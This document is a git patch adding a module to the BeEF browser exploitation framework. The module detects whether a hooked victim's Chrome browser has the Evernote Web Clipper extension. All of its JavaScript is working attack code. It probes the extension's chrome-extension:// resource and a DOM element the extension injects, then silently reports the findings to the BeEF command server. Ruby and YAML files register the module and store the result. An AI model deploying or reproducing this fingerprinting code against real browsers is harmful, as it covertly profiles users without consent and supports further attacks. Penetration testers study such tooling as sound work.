From 55e36ff095970cf23f3408f1a1fd5b48723aebe8 Mon Sep 17 00:00:00 2001 From: Christian Frichot Date: Wed, 7 May 2014 19:11:27 +0800 Subject: [PATCH] Detect the presense of Evernotes Clipper Extension in Chrome --- .../detect_evernote_clipper/command.js | 34 +++++++++++++++++++ .../detect_evernote_clipper/config.yaml | 16 +++++++++ .../browser/detect_evernote_clipper/module.rb | 14 ++++++++ 3 files changed, 64 insertions(+) create mode 100644 modules/browser/detect_evernote_clipper/command.js create mode 100644 modules/browser/detect_evernote_clipper/config.yaml create mode 100644 modules/browser/detect_evernote_clipper/module.rb diff --git a/modules/browser/detect_evernote_clipper/command.js b/modules/browser/detect_evernote_clipper/command.js new file mode 100644 index 000000000..e27a44e3f --- /dev/null +++ b/modules/browser/detect_evernote_clipper/command.js @@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result = ""; + + var s = document.createElement('script'); + s.onload = function() { + result = "Detected through presense of extension content script."; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+result); + } + s.src = 'chrome-extension://pioclpoplcdbaefihamjohnefbikjilc/content/frame.js'; + document.body.appendChild(s); + + var evdiv = document.getElementById('evernoteGlobalTools'); + if (typeof(evdiv) != 'undefined' && evdiv != null) { + // Evernote Web Clipper must have been active as well, because we can detect one of the iFrames + iframeresult = "Detected evernoteGlobalTools iFrame. Looks like the Web Clipper has been used on this page"; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper="+iframeresult); + } + + + setTimeout(function() { + if (result == "") { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "evernote_clipper=Not Detected"); + } + document.body.removeChild(s); + }, 2000); + +}); + diff --git a/modules/browser/detect_evernote_clipper/config.yaml b/modules/browser/detect_evernote_clipper/config.yaml new file mode 100644 index 000000000..ac9006872 --- /dev/null +++ b/modules/browser/detect_evernote_clipper/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_evernote_clipper: + enable: true + category: "Browser" + name: "Detect Evernote Web Clipper" + description: "This module checks if the Evernote Web Clipper extension is installed and active." + authors: ["xntrik"] + target: + not_working: ["IE"] + working: ["C"] diff --git a/modules/browser/detect_evernote_clipper/module.rb b/modules/browser/detect_evernote_clipper/module.rb new file mode 100644 index 000000000..1ec206ee3 --- /dev/null +++ b/modules/browser/detect_evernote_clipper/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_evernote_clipper < BeEF::Core::Command + + def post_execute + content = {} + content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil? + save content + end + +end